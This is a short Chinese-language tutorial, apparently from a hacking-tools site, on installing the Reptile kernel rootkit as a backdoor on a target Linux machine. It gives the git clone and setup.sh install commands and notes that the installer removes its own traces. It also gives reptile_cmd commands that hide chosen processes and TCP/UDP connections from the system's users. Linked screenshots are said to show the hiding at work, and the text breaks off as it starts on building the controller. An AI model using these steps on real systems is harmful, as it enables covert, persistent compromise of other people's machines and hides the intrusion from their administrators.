https://www.3hack.com/tools/85.html

项目地址https://github.com/f0rb1dd3n/Reptile

1.下载 客户端和服务端都用在一起用的

git clone https://github.com/f0rb1dd3n/Reptile.gitcd Reptile

2.目标机器安装后门 全自动化安装,安装后也会全自动删除 要注意需要交互式shell

./setup.sh install

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0372c1bd-af60-4bc2-b8f4-1eb6f4bc54ea/3749342781.jpg

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0fdfa50a-e92e-4914-b786-49f54dbdaa09/3036706158.jpg

看看rootkit效果

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0b357179-a53e-4891-acff-18664afa05c3/4159715848.jpg

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0bae69f7-452d-4b7d-a91d-9dfb2d6d9b69/3563267828.jpg

没有进程,没有连接

这个后门还可以用命令隐藏任意其他你想要隐藏的东西

隐藏进程: /reptile/reptile_cmd hide <pid> 显示进程: /reptile/reptile_cmd show <pid>

隐藏tcp或者udp连接

隐藏: /reptile/reptile_cmd udp <IP> <port> hide 显示: /reptile/reptile_cmd udp <IP> <port> show

目标机器上种这个后门还是很简单的 就是只能对lkm机器使用

3.控制端安装使用 先生成控制端程序

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3bac7356-1a8d-4cee-9a7d-bf85f50b297a/2215637349.jpg